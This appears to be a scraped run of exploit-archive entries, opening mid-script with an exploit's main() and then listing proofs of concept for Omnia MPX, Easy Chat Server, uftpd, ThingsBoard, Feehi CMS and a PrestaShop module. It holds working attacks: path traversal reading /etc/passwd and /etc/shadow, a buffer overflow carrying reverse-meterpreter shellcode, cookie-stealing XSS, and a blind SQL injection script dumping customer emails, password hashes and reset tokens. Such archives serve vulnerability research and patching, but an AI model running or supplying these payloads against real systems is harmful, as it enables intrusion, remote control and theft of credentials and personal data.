f"{settings.c0}" ) else: sys.exit() def main(): try: arguments() term_settings() address_check(arguments.option.address) random_filename() if arguments.option.execute: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) execute( arguments.option.address, arguments.option.file, random_filename.name, ) else: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) except KeyboardInterrupt: print(f"\n{settings.i3}quitting.") sys.exit() except requests.exceptions.Timeout: print( f"{settings.c1}{settings.i2}the request timed out " f"while attempting to connect.{settings.c0}" ) sys.exit() except requests.ConnectionError: print( f"{settings.c1}{settings.i2}could not connect " f"to {arguments.option.address}{settings.c0}" ) sys.exit() except FileNotFoundError: print( f"{settings.c1}{settings.i2}{arguments.option.file} " f"could not be found.{settings.c0}" ) except ( requests.exceptions.MissingSchema, requests.exceptions.InvalidURL, requests.exceptions.InvalidSchema ): print( f"{settings.c1}{settings.i2}a valid schema and address " f"must be supplied.{settings.c0}" ) sys.exit() if __name__ == "__main__": main()
Omnia MPX 1.5.0+r1 - Path Traversal
# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal # Date: 24/7/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.telosalliance.com/ # Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions # Version: 1.5.0+r1 # Tested on: MacOS # PoC: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow User Database: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) # Exploit Author: r00tpgp @ http://www.r00tpgp.com # Usage: python easychat-exploit.py <victim-ip> <port> # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 # CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/ # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000) #!/usr/bin/python3 import sys import socket from struct import pack host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user junk = b"A" * 217 nseh = pack("<L", 0x06eb9090) # short jump 6 bytes seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode shellcode = b"\x90" * 16 shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33" shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6" shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26" shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f" shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16" shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a" shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35" shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21" shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84" shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90" shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78" shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9" shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa" shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e" shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e" shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e" shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0" shellcode += 
b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0" shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac" shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43" shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9" shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2" shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee" shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6" shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde" shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b" shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44" buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n" buffer += b"User-Agent: Mozilla/4.0\r\n" buffer += b"Host: 192.168.1.136:80\r\n" buffer += b"Accept-Language: en-us\r\n" buffer += b"Accept-Encoding: gzip, deflate\r\n" buffer += b"Referer: http://192.168.1.136\r\n" buffer += b"Connection: Keep-Alive\r\n\r\n" print("[*] Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buffer) s.close() print("[+] Done!")
uftpd 2.10 - Directory Traversal (Authenticated)
# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated) # Google Dork: N/A # Exploit Author: Aaron Esau (arinerron) # Vendor Homepage: https://github.com/troglobit/uftpd # Software Link: https://github.com/troglobit/uftpd # Version: 2.7 to 2.10 # Tested on: Linux # CVE : CVE-2020-20277 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277 # Reference: https://arinerron.com/blog/posts/6 #Product: uftpd 2.7 to 2.10 #Proof-Of-Concept: 1-Arbitrary files can be read using directory traversal after authenticating, if the application is not running as root. If the server has anonymous login enabled, it is possible to read arbitrary files even without authentication. #Steps 1-Set up an nc listener on the attacking machine on TCP port 1258 nc -lnvp 1258 2-Log in to the FTP service 3-List files ftp> ls ../../../ 4-Set the attacker's IP address and retrieve files PORT 127,0,0,1,1,1002 RETR ../../../etc/passwd
ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
# Exploit Title: ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS) # Date: 03/08/2022 # Exploit Author: Steffen Langenfeld & Sebastian Biehler # Vendor Homepage: https://thingsboard.io/ # Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1 # Version: 3.3.1 # CVE : CVE-2021-42750 # Tested on: Linux #Proof-Of-Concept: When creating a rule node of any type and placing a script payload in the rule node's name, the payload is executed upon hovering over the node within the editor. #Steps 1. Create a new rule node (via the menu "Rule chains") 2. Put a javascript payload within the name, e.g. <script>alert('XSS')</script> 3. Save the node 4. Upon hovering over the node within the editor, the payload is executed
Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS) # Date: 02-08-2022 # Exploit Author: Shivam Singh # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms #Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/ # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Windows, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1-Sign up at https://localhost.cms.feehi/ 2-Inject the XSS payload in Username: "><script>alert(document.cookie)</script>, fill all required fields and click the SignUp button 3-Log in to your account, go to any article page and the XSS will trigger.
Prestashop blockwishlist module 2.1.0 - SQLi
# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi # Date: 29/07/22 # Exploit Author: Karthik UJ (@5up3r541y4n) # Vendor Homepage: https://www.prestashop.com/en # Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0 # Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/ # Version (blockwishlist): 2.1.0 # Version (prestashop): 1.7.8.1 # Tested on: Linux # CVE: CVE-2022-31101 # This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop import requests url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1 cookie = input("Enter cookie value:\n") header = { "Cookie": cookie } # Define static stuff param = "&order=" staticStart = "p.name, (select case when (" staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc" charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~' charset = list(charset) emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.' 
emailCharset = list(emailCharset) # Query current database name length print("\nFinding db name's length:") for length in range(1, 65): condition = "LENGTH(database())=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: dbLength=length print("Length: ", length, end='') print("\n") break print("Enumerating current database name:") databaseName = '' for i in range(1, dbLength+1): for char in charset: condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')" fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') databaseName += char break print() # Enumerate any table prefix = "ps_" tableName = prefix + "customer" staticStart = "p.name, (select case when (" staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer=" staticEnd2 = "); -- .asc" print("\nEnumerating " + tableName + " table") for id in range(1, 10): condition = "id_customer=" + str(id) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) print("\nOnly " + str(id - 1) + " records found. 
Exiting...") break except requests.exceptions.Timeout: pass print("\nid = " + str(id)) # Finding firstname length for length in range(0, 100): condition = "LENGTH(firstname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: firstnameLength=length print("Firstname length: ", length, end='') print() break # Enumerate firstname firstname = '' print("Firstname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding lastname length for length in range(1, 100): condition = "LENGTH(lastname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: lastnameLength=length print("Lastname length: ", length, end='') print() break # Enumerate lastname lastname = '' print("Lastname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding email length for length in range(1, 320): condition = "LENGTH(email)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: emailLength=length print("Email length: ", length, end='') print() break # Enumerate 
email email = '' print("Email: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') email += char except requests.exceptions.Timeout: print(char, end='') email += char break print() # Finding password hash length for length in range(1, 500): condition = "LENGTH(passwd)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordHashLength=length print("Password hash length: ", length, end='') print() break # Enumerate password hash passwordHash = '' print("Password hash: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordHash += char except requests.exceptions.Timeout: print(char, end='') passwordHash += char break print() # Finding password reset token length for length in range(0, 500): condition = "LENGTH(reset_password_token)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordResetTokenLength=length print("Password reset token length: ", length, end='') print() break # Enumerate password reset token passwordResetToken = '' print("Password reset token: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" 
+ char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordResetToken += char except requests.exceptions.Timeout: print(char, end='') passwordResetToken += char break print()